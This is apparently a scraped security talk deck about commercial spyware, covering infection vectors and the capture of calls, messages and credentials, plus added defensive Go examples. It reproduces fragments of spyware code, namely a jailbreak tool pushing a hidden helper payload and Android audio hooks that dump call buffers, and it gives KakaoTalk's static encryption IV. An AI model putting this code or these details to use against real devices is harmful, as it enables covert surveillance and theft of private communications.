A Stealthy Information Stealers
They know the things that we can’t help with
Documented by Ahn Sanghwan (h2spice@gmail.com)
Agenda
I. Stealthy Stealers
II. Infection Vectors
III. Capture Sensitive Data
IV. Conclusion
Stealthy Stealer
They want to look through our eyes.
The Web is moving to HTTPS, and encryption is increasingly common.
So they are looking for a solution: they hack the target, overcome the encryption, and capture the relevant data.
https://youtu.be/TOXRHK_1kVg?t=30s
FinSpy
There are many commercial spyware toolkits for intelligence agencies.
Many countries have bought spyware toolkits.
• FinFisher (FinSpy) customers: 32
Canada, Mexico, Panama, United States, Australia, Bangladesh, Brunei, India, Indonesia, Japan,
Malaysia, Mongolia, Pakistan, Turkmenistan, Vietnam, Singapore, Ethiopia, Nigeria, South Africa,
Austria, Bulgaria, Latvia, Lithuania, Macedonia, Netherlands, Romania, Serbia, United Kingdom,
Bahrain, Turkey, Qatar, United Arab Emirates
• Hacking Team (Da Vinci, Galileo) customers: 36
Brazil, Lebanon, Bahrain, Poland, Colombia, Azerbaijan, Honduras, Cyprus, Turkey, Nigeria, Russia,
Thailand, Switzerland, South Korea, Oman, Ecuador, Spain, Vietnam, Mongolia, Czech Republic,
Luxembourg, Egypt, Ethiopia, Panama, Uzbekistan, Singapore, Sudan, Kazakhstan, United States,
United Arab Emirates, Malaysia, Hungary, Chile, Saudi Arabia, Morocco, Italy, Mexico
There are also many commercial spyware toolkits sold to the public.
They target almost all platforms.
Collect everything, constantly.
Infection Vectors
Local and Remote
In Local
• Bootable CD/DVD/USB
• BadUSB
• Customised jailbreaking or rooting tools for mobile devices
https://youtu.be/oNsXKPHBR3s?t=4m32s
With bootable CD/DVD/USB or BadUSB
https://youtu.be/oNsXKPHBR3s?t=6m8s
With customised jailbreaking or rooting tools for mobile devices
With customised jailbreaking or rooting tools for mobile devices

```c
// Decompiler output reproduced from the slide (a customised jailbreak tool):
// it creates a directory on the device over AFC, then pushes Cydia.tar,
// pangu.tar, pangu_ex.tar and packagelist.tar in turn, sleeping 0x7A120 us
// (500 ms) after each successful transfer, and finally helper.tar when a
// flag in the configuration is set. The listing is cut off on the slide.
if ( !sub_100020990(v4, off_102502328) )
    afc_make_directory((__int64)v4, off_102502328);
v1 = sub_100021000(off_102502328, "Cydia.tar");
sub_100020AE0(v4, v1);
if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 128LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 136LL)) )
{
    free(v1);
    usleep(0x7A120u);
    v1 = sub_100021000(off_102502328, "pangu.tar");
    sub_100020AE0(v4, v1);
    if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 144LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 152LL)) )
    {
        free(v1);
        usleep(0x7A120u);
        v1 = sub_100021000(off_102502328, "pangu_ex.tar");
        sub_100020AE0(v4, v1);
        if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 160LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 168LL)) )
        {
            free(v1);
            usleep(0x7A120u);
            v1 = sub_100021000(off_102502328, "packagelist.tar");
            sub_100020AE0(v4, v1);
            if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 192LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 200LL)) )
            {
                free(v1);
                usleep(0x7A120u);
                v2 = 1;
                v1 = 0LL;
                if ( *(_BYTE *)(*(_QWORD *)(a1 + 8) + 1264LL) )
                {
                    v1 = sub_100021000(off_102502328, "helper.tar");
```
Mactans (Black Hat 2013)
• Injecting malware into iOS devices via a malicious charger
• Yeongjin Jang, Billy Lau, Chengyu Song, Georgia Institute of Technology
In Remote
• Sending an executable or document file
• Sending a link or QR code that leads to malware
• Modifying network traffic on the fly (acting on data downloaded by the target's device)
  • Replace a URL resource
  • Inject-EXE
  • Inject-HTML-Flash (0-day vulnerabilities)
In Remote - Network Injection
https://youtu.be/BXTyxAsYk3w?t=12s
Capture Sensitive Data
Sensitive data that a stealer can capture:
Money, Call, Message, Password, Contacts, Location, MIC, E-Mail, Camera, KeyLog, Clipboard, Web History, File, Screenshot
Android Call & MIC
• Audio unit hooking by Dynamic Binary Instrumentation (DBI)
Hook prototypes as listed on the slide (every line is cut off at the slide's right edge):

```c
void* setStreamVolume_h(void* a, void* b, void* c, void* d, voi
void* o, void* p, void* q, void* r, void* s, void* t, void* u, void*
void* newTrack_h(void* a, void* b, void* c, void* d, void* e, voi
void* p, void* q, void* r, void* s, void* t, void* u, void* w) ;
void* startTrack_h(void* a, void* b, void* c, void* d, void* e,
void* p, void* q, void* r, void* s, void* t, void* u, void* w) ;
void* stopTrack_h(void* a, void* b, void* c, void* d, void* e, vo
void* p, void* q, void* r, void* s, void* t, void* u, void* w) ;
void* threadLoop_h(void* a, void* b, void* c, void* d, void* e,
void* p, void* q, void* r, void* s, void* t, void* u, void* w) ;
void* audioFlingerC1_h(void* a, void* b, void* c, void* d, void
void* o, void* p, void* q, void* r, void* s, void* t, void* u, void*
void* audioFlingerC2_h(void* a, void* b, void* c, void* d, void
void* o, void* p, void* q, void* r, void* s, void* t, void* u, void*
void* getBuffer_h(void* a, void* b, void* c, void* d, void* e, vo
void* p, void* q, void* r, void* s, void* t, void* u, void* w) ;
void* stepUser_h(void* a, void* b, void* c, void* d, void* e, voi
void* p, void* q, void* r, void* s, void* t, void* u, void* w) ;
void* stepServer_h(void* a, void* b, void* c, void* d, void* e,
void* p, void* q, void* r, void* s, void* t, void* u, void* w) ;
void* recordTrack_getNextBuffer_h(void* a, void* b, void* c,
void* n, void* o, void* p, void* q, void* r, void* s, void* t, void*
void* recordTrack_getNextBuffer2_h(void* a, void* b, void* c
m, void* n, void* o, void* p, void* q, void* r, void* s, void* t, vo
void* playbackTrack_getNextBuffer_h(void* a, void* b, void*
m, void* n, void* o, void* p, void* q, void* r, void* s, void* t, vo
void* playbackTrack_getNextBuffer2_h(void* a, void* b, void*
void* m, void* n, void* o, void* p, void* q, void* r, void* s, void*
void* playbackTrack_getNextBuffer3_h(void* a, void* b, void*
void* m, void* n, void* o, void* p, void* q, void* r, void* s, void*
void* recordThread_getNextBuffer_h(void* a, void* b, void* c
m, void* n, void* o, void* p, void* q, void* r, void* s, void* t, vo
void* playbackTimedTrack_getNextBuffer_h(void* a, void* b,
void* m, void* n, void* o, void* p, void* q, void* r, void* s, void*
void* newRecordTrack_h(void* a, void* b, void* c, void* d, void
void* o, void* p, void* q, void* r, void* s, void* t, void* u, void*
void* recordTrackStart_h(void* a, void* b, void* c, void* d, vo
void* o, void* p, void* q, void* r, void* s, void* t, void* u, void*
void* playbackTrackStart_h(void* a, void* b, void* c, void* d,
void* o, void* p, void* q, void* r, void* s, void* t, void* u, void*
void* recordTrackStop_h(void* a, void* b, void* c, void* d, voi
```
record2: fragment of the getNextBuffer hook shown on the slide. Each captured audio buffer is written to a dump file behind a six-word placeholder header (0xdeaddead); the backslash escapes in the log strings were lost in the slide export and are restored here.

```c
    if( cblk_tmp == NULL ) {
#ifdef DBG
        log("uthash shit happened\n");
#endif
        return result;
    }
#ifdef DBG
    log("\t\tadded cblk from within getNextBuffer\n");
#endif
}
// otherwise dump from cblk_tmp: buffer->raw [1] to buffer->frameCount [2] * frameSize [3]
// and update cblk_tmp
else {
    if( result == 0 && cblk_tmp->lastFrameCount != 0 ) { // aka NO_ERROR and cblk_tmp->last* contains valid pointers (see goto getNextBuffer_exit)
        // header
        headerStart = lseek(fd_in, 0, SEEK_CUR);
#ifdef DBG
        log("\t\theaderStart: %x\n", headerStart);
#endif
        uintTmp = 0xdeaddead;
        write(fd_in, &uintTmp, 4); // 1] cblk
        write(fd_in, &uintTmp, 4); // 2] timestamp
        write(fd_in, &uintTmp, 4); // 3] timestamp
        write(fd_in, &uintTmp, 4); // 4] streamType
        write(fd_in, &uintTmp, 4); // 5] sampleRate
        write(fd_in, &uintTmp, 4); // 6] size of block
#ifdef DBG
        log("\t\t\tbuffer spans: %p -> %p\n", cblk_tmp->lastBufferRaw, (cblk_tmp->lastBufferRaw + cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize ) );
#endif
        // raw PCM frames follow the header
        res = write(fd_in, cblk_tmp->lastBufferRaw, cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize);
#ifdef DBG
        log("\t\t\t\twrote: %d - expected: %d\n", res, cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize );
#endif
        positionTmp = lseek(fd_in, 0, SEEK_CUR);
#ifdef DBG
        log("\t\tfake header written: %x\n", positionTmp);
#endif // Dumping Audio Buffer
```
iOS Call & MIC
• Audio unit hooking by Substrate
Dumping the audio buffer (Core Audio fragment from the slide; it starts after the mic buffer is set up and is cut off before the files are closed). The mic and speaker dumps are read frame by frame and interleaved into one stereo file, mic on the left channel and speaker on the right.

```c
micBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples;
micBuffer.mBuffers[0].mData = malloc(micBuffer.mBuffers[0].mDataByteSize);
AudioBufferList speakerBuffer;
speakerBuffer.mNumberBuffers = 1;
speakerBuffer.mBuffers[0].mNumberChannels = 1;
speakerBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples;
speakerBuffer.mBuffers[0].mData = malloc(speakerBuffer.mBuffers[0].mDataByteSize);
AudioBufferList mixBuffer;
mixBuffer.mNumberBuffers = 1;
mixBuffer.mBuffers[0].mNumberChannels = 2;
mixBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples * 2;
mixBuffer.mBuffers[0].mData = malloc(mixBuffer.mBuffers[0].mDataByteSize);
// Converting
while (true)
{
    // Reading data from input files; the second read is bounded by
    // what the first one returned, so the loop stops at the shorter file
    UInt32 framesToRead = bufferSizeInSamples;
    ExtAudioFileRead(micFile, &framesToRead, &micBuffer);
    ExtAudioFileRead(speakerFile, &framesToRead, &speakerBuffer);
    if (framesToRead == 0)
    {
        break;
    }
    // Building interleaved stereo buffer - left channel is mic, right is speaker
    for (int i = 0; i < framesToRead; i++)
    {
        memcpy((char*)mixBuffer.mBuffers[0].mData + i * sampleSize * 2,
               (char*)micBuffer.mBuffers[0].mData + i * sampleSize, sampleSize);
        memcpy((char*)mixBuffer.mBuffers[0].mData + i * sampleSize * 2 + sampleSize,
               (char*)speakerBuffer.mBuffers[0].mData + i * sampleSize, sampleSize);
    }
    // Writing to output file - LPCM will be converted to AAC
    ExtAudioFileWrite(mixFile, framesToRead, &mixBuffer);
}
// Closing files
// Dumping Audio Buffer
```
Capture Message & Other Data
• Messages are stored as files (.db, .sqlite, .xml, etc.)
• Plain text
• Encrypted messages need decryption (usually the key is stored in local storage)
Encrypted Message - the case of KakaoTalk
• AES-256-CBC encryption
• The encryption key is generated from the UserId
• The IV is static (1608096f02172b0821210a1003030706)
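Added example, not from the slides and not KakaoTalk's code, of why the static IV on this slide matters: AES-256-CBC under a fixed key and a fixed IV turns equal message prefixes into equal first ciphertext blocks, so a copied message database leaks which messages start the same way before any key is recovered. `WeakKey` and its SHA-256 derivation are an assumed stand-in for "key generated from the UserId" (the slide does not give the derivation); the corrected setting draws a random IV per message.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// StaticIV returns the fixed IV quoted on the slide.
func StaticIV() []byte {
	iv, err := hex.DecodeString("1608096f02172b0821210a1003030706")
	if err != nil || len(iv) != aes.BlockSize {
		panic("bad static IV")
	}
	return iv
}

// WeakKey stands in for "key generated from the UserId". SHA-256 of the ID is
// an assumed placeholder, not the real derivation. Whatever the function, a
// key that depends only on a non-secret, low-entropy ID can be recomputed by
// anyone who reads the ID off the device, so it provides no confidentiality
// against someone holding the phone.
func WeakKey(userID string) []byte {
	sum := sha256.Sum256([]byte(userID))
	return sum[:] // 32 bytes: AES-256
}

// pkcs7Pad pads to a whole number of AES blocks, as CBC requires.
func pkcs7Pad(data []byte, blockSize int) []byte {
	n := blockSize - len(data)%blockSize
	return append(append([]byte{}, data...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// EncryptCBC returns iv || AES-256-CBC(key, iv, pkcs7(plaintext)).
// A nil iv selects the corrected setting: a fresh random IV per message.
func EncryptCBC(key, iv, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if iv == nil {
		iv = make([]byte, aes.BlockSize)
		if _, err := rand.Read(iv); err != nil {
			return nil, err
		}
	}
	padded := pkcs7Pad(plaintext, aes.BlockSize)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return append(append([]byte{}, iv...), out...), nil
}

// SharesFirstBlock encrypts two messages under the same key and reports
// whether their first ciphertext blocks are identical. With a static IV this
// is true whenever the messages share their first 16 plaintext bytes; with a
// random IV per message the first blocks differ.
func SharesFirstBlock(key, iv []byte, m1, m2 string) (bool, error) {
	c1, err := EncryptCBC(key, iv, []byte(m1))
	if err != nil {
		return false, err
	}
	c2, err := EncryptCBC(key, iv, []byte(m2))
	if err != nil {
		return false, err
	}
	// skip the 16-byte IV prefix and compare the first ciphertext block only
	return bytes.Equal(c1[aes.BlockSize:2*aes.BlockSize], c2[aes.BlockSize:2*aes.BlockSize]), nil
}

func main() {
	key := WeakKey("user-12345") // constructed user ID
	m1 := "Meet at 10:00 tomorrow, same place"
	m2 := "Meet at 10:00 tomorrow, new place"
	static, _ := SharesFirstBlock(key, StaticIV(), m1, m2)
	random, _ := SharesFirstBlock(key, nil, m1, m2)
	fmt.Println("static IV leaks the shared prefix:", static) // true
	fmt.Println("random IV leaks the shared prefix:", random) // false
}
```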
Deleted Message Recovery
• Before deleting
• After deleting
Capture Message via Window
• Accessibility
• Special permission for Accessibility
Messages and other data
• Messages are stored as files (.db, .sqlite, .xml, etc.)
• Plain text
• Encrypted messages need decryption (usually the encryption key is stored in local storage)
• Special permission: Accessibility
• SMS, BLIND
Capture Sensitive Data
Authentication Bruteforce Attack
• Using credentials collected from other websites that were hacked
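The bruteforce described here replays passwords leaked from one site against accounts on another, so it looks different from a user mistyping a password: many distinct accounts, a few attempts each, from one source. Added example, not from the slides, of detection logic a defender can run over authentication logs; the log format and the sample lines are constructed for the demonstration.

```go
package main

import (
	"bufio"
	"fmt"
	"sort"
	"strings"
	"time"
)

// sampleLog is a constructed authentication log (not from any real system).
// Fields: timestamp, result (OK/FAIL), username, source IP.
const sampleLog = `2016-05-03T10:00:01Z FAIL alice 203.0.113.7
2016-05-03T10:00:03Z FAIL bob 203.0.113.7
2016-05-03T10:00:04Z FAIL carol 203.0.113.7
2016-05-03T10:00:06Z OK dave 203.0.113.7
2016-05-03T10:00:08Z FAIL erin 203.0.113.7
2016-05-03T10:00:09Z FAIL frank 203.0.113.7
2016-05-03T10:00:11Z FAIL grace 203.0.113.7
2016-05-03T10:01:00Z FAIL alice 198.51.100.9
2016-05-03T10:01:20Z FAIL alice 198.51.100.9
2016-05-03T10:01:40Z FAIL alice 198.51.100.9
2016-05-03T10:02:00Z FAIL alice 198.51.100.9
2016-05-03T10:02:30Z OK alice 198.51.100.9
2016-05-03T10:05:00Z OK henry 192.0.2.5
`

type attempt struct {
	ts   time.Time
	ok   bool
	user string
	ip   string
}

// parseLog parses the space-separated format above; malformed lines are skipped.
func parseLog(raw string) []attempt {
	var out []attempt
	sc := bufio.NewScanner(strings.NewReader(raw))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		if len(f) != 4 {
			continue
		}
		ts, err := time.Parse(time.RFC3339, f[0])
		if err != nil {
			continue
		}
		out = append(out, attempt{ts: ts, ok: f[1] == "OK", user: f[2], ip: f[3]})
	}
	return out
}

// StuffingSources returns, sorted, the source IPs that failed logins against
// at least minUsers distinct accounts inside any window of the given length.
// One account failing repeatedly (a forgotten password) is not flagged.
func StuffingSources(raw string, window time.Duration, minUsers int) []string {
	byIP := map[string][]attempt{}
	for _, a := range parseLog(raw) {
		if !a.ok {
			byIP[a.ip] = append(byIP[a.ip], a)
		}
	}
	var flagged []string
	for ip, fails := range byIP {
		sort.Slice(fails, func(i, j int) bool { return fails[i].ts.Before(fails[j].ts) })
		for i := range fails {
			users := map[string]bool{}
			for j := i; j < len(fails) && fails[j].ts.Sub(fails[i].ts) <= window; j++ {
				users[fails[j].user] = true
			}
			if len(users) >= minUsers {
				flagged = append(flagged, ip)
				break
			}
		}
	}
	sort.Strings(flagged)
	return flagged
}

// CompromisedAccounts lists accounts that logged in successfully from a
// flagged source: the replayed credential was valid there, so these users
// need a password reset and a second-channel check, not just a blocked IP.
func CompromisedAccounts(raw string, flagged []string) []string {
	bad := map[string]bool{}
	for _, ip := range flagged {
		bad[ip] = true
	}
	seen := map[string]bool{}
	var users []string
	for _, a := range parseLog(raw) {
		if a.ok && bad[a.ip] && !seen[a.user] {
			seen[a.user] = true
			users = append(users, a.user)
		}
	}
	sort.Strings(users)
	return users
}

func main() {
	flagged := StuffingSources(sampleLog, 5*time.Minute, 5)
	fmt.Println("credential-stuffing sources:", flagged)            // [203.0.113.7]
	fmt.Println("accounts to reset:", CompromisedAccounts(sampleLog, flagged)) // [dave]
}
```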
Conclusion
We still face security holes that we can hardly control, or cannot control at all.
• Injection at the network level
: File reputation services
: VPN
• Encryption
: Trusted Platform Module - encrypt/decrypt sensitive data using the secure world
• Authentication bruteforce attack
: 2-channel authentication
Q / A
Thanks

Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 

Recently uploaded (20)

Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 

A Stealthy Stealers - Spyware Toolkit and What They Do

  • 15. Infection Vectors: In Local
  - Bootable CD/DVD/USB
  - Bad-USB
  - Customised jail-breaking or rooting tools for mobile devices
  https://youtu.be/oNsXKPHBR3s?t=4m32s
  • 16. Infection Vectors: with a bootable CD/DVD/USB or Bad-USB
  https://youtu.be/oNsXKPHBR3s?t=6m8s
  • 17. Infection Vectors: with customised jail-breaking (or rooting) tools for mobile devices
  • 18. Infection Vectors: with customised jail-breaking or rooting tools for mobile devices
  Decompiled fragment from a customised jailbreak tool. Alongside the archives a normal jailbreak pushes (Cydia.tar, pangu.tar, pangu_ex.tar, packagelist.tar), the tool uploads an extra helper.tar when a flag in its state is set. Every archive is written to the device over AFC with a 500 ms pause between uploads.

```c
/* Hex-Rays pseudocode from the customised jailbreak tool (slide 18). The
   sub_* names are the decompiler's; their roles are inferred from use:
   sub_100021000 joins the staging directory and a file name,
   sub_100020AE0 prepares the remote path, sub_1000208E0 uploads the blob
   whose pointer and length are read from the tool's state object (a1). */
if ( !sub_100020990(v4, off_102502328) )
  afc_make_directory((__int64)v4, off_102502328);   /* create the staging directory if missing */
v1 = sub_100021000(off_102502328, "Cydia.tar");
sub_100020AE0(v4, v1);
if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 128LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 136LL)) )
{
  free(v1);
  usleep(0x7A120u);                                 /* 500,000 us between uploads */
  v1 = sub_100021000(off_102502328, "pangu.tar");
  sub_100020AE0(v4, v1);
  if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 144LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 152LL)) )
  {
    free(v1);
    usleep(0x7A120u);
    v1 = sub_100021000(off_102502328, "pangu_ex.tar");
    sub_100020AE0(v4, v1);
    if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 160LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 168LL)) )
    {
      free(v1);
      usleep(0x7A120u);
      v1 = sub_100021000(off_102502328, "packagelist.tar");
      sub_100020AE0(v4, v1);
      if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 192LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 200LL)) )
      {
        free(v1);
        usleep(0x7A120u);
        v2 = 1;
        v1 = 0LL;
        if ( *(_BYTE *)(*(_QWORD *)(a1 + 8) + 1264LL) )  /* flag: also push the extra payload */
        {
          v1 = sub_100021000(off_102502328, "helper.tar");
          /* the listing ends here on the slide */
```
  • 19. Infection Vectors: Mactans (Black Hat 2013)
  - Injecting Malware into iOS Devices via Malicious Chargers
  - Yeongjin Jang, Billy Lau, Chengyu Song, Georgia Institute of Technology
  • 20. Infection Vectors: In Remote
  - Sending an executable or document file
  - Sending a link or QR code that leads to malware
  - Modifying network traffic on the fly (acting on the data the target's device downloads):
    - Replace URL resource
    - Inject-EXE
    - Inject-HTML-Flash (0-day vulnerabilities)
  • 24. Infection Vectors: In Remote - Network Injection
  https://youtu.be/BXTyxAsYk3w?t=12s
  • 25. Capture Sensitive Data: sensitive data that a stealer can capture
  Money, Call, Message, Password, Contacts, Location, MIC, E-Mail, Camera, KeyLog, Clipboard, Web History, File, Screenshot
  • 26. Capture Sensitive Data: Android Call & MIC
  - Audio unit hooking by Dynamic Binary Instrumentation (DBI): the hooks listed on the next slide are placed on the functions of Android's AudioFlinger that create, start, stop and feed playback and record tracks, so both sides of a call and the microphone can be copied out of the buffers as they pass through.
  • 27. Hook prototypes declared by the Android audio capture module. Every prototype is clipped at the right edge of the slide; each is declared with a long list of opaque void* arguments (a, b, c, ... u, w) in place of the real signature. The hook names that survive:
  setStreamVolume_h, newTrack_h, startTrack_h, stopTrack_h, threadLoop_h, audioFlingerC1_h, audioFlingerC2_h, getBuffer_h, stepUser_h, stepServer_h, recordTrack_getNextBuffer_h, recordTrack_getNextBuffer2_h, playbackTrack_getNextBuffer_h, playbackTrack_getNextBuffer2_h, playbackTrack_getNextBuffer3_h, recordThread_getNextBuffer_h, playbackTimedTrack_getNextBuffer_h, newRecordTrack_h, recordTrackStart_h, playbackTrackStart_h, recordTrackStop_h
  • 28. Dumping the audio buffer (record2). Inside the getNextBuffer hook: each time AudioFlinger hands out a track buffer, the previous buffer's raw PCM is appended to the dump file behind a 24-byte header. The header is first written with placeholder values and its position (headerStart) is saved so it can be patched once the real values are known.

```c
if( cblk_tmp == NULL ) {
#ifdef DBG
    log("uthash shit happened\n");
#endif
    return result;
}
#ifdef DBG
log("\t\tadded cblk from within getNextBuffer\n");
#endif
}
// otherwise dump from cblk_tmp: buffer->raw [1] to buffer->frameCount [2] * frameSize [3]
// and update cblk_tmp
else {
    if( result == 0 && cblk_tmp->lastFrameCount != 0 ) {
        // aka NO_ERROR and cblk_tmp->last* contains valid pointers (see goto getNextBuffer_exit)
        // header: six 4-byte fields, placeholders for now
        headerStart = lseek(fd_in, 0, SEEK_CUR);
#ifdef DBG
        log("\t\theaderStart: %x\n", headerStart);
#endif
        uintTmp = 0xdeaddead;
        write(fd_in, &uintTmp, 4); // 1] cblk
        write(fd_in, &uintTmp, 4); // 2] timestamp
        write(fd_in, &uintTmp, 4); // 3] timestamp
        write(fd_in, &uintTmp, 4); // 4] streamType
        write(fd_in, &uintTmp, 4); // 5] sampleRate
        write(fd_in, &uintTmp, 4); // 6] size of block
#ifdef DBG
        log("\t\t\tbuffer spans: %p -> %p\n", cblk_tmp->lastBufferRaw,
            (cblk_tmp->lastBufferRaw + cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize));
#endif
        // raw PCM of the previous buffer: frameCount * frameSize bytes
        res = write(fd_in, cblk_tmp->lastBufferRaw, cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize);
#ifdef DBG
        log("\t\t\t\twrote: %d - expected: %d\n", res, cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize);
#endif
        positionTmp = lseek(fd_in, 0, SEEK_CUR);
#ifdef DBG
        log("\t\tfake header written: %x\n", positionTmp);
#endif
```
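To make use of such a dump after the fact, an analyst has to split it back into buffers. The Go program below is an added example, not code from the toolkit or from the slides: it parses the record layout the hook writes (a six-word little-endian header followed by the raw buffer), stops cleanly at a truncated or never-patched record, and reassembles one PCM stream per track. Two assumptions are made: that the 0xdeaddead placeholders are patched with real values once the hook knows them (the saved headerStart is consistent with that), and that the two timestamp words can be kept verbatim since the slide does not say what they carry. The sample dump is constructed inside the code.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// The hook pre-fills every header field with this value and patches the real
// values in afterwards (assumption based on the saved headerStart); a record
// whose size field still holds it was never completed.
const placeholder = 0xdeaddead

// headerSize: six 4-byte fields, little-endian as written on the device.
const headerSize = 24

// Record is one dumped buffer. The two timestamp words are kept verbatim.
type Record struct {
	Cblk       uint32 // address of the track's control block: identifies the track
	Ts0, Ts1   uint32
	StreamType uint32
	SampleRate uint32
	PCM        []byte // frameCount * frameSize raw bytes
}

// EncodeRecord serialises a record in the hook's layout. It exists to build
// test input; real dumps come off the phone.
func EncodeRecord(r Record) []byte {
	out := make([]byte, headerSize+len(r.PCM))
	fields := [6]uint32{r.Cblk, r.Ts0, r.Ts1, r.StreamType, r.SampleRate, uint32(len(r.PCM))}
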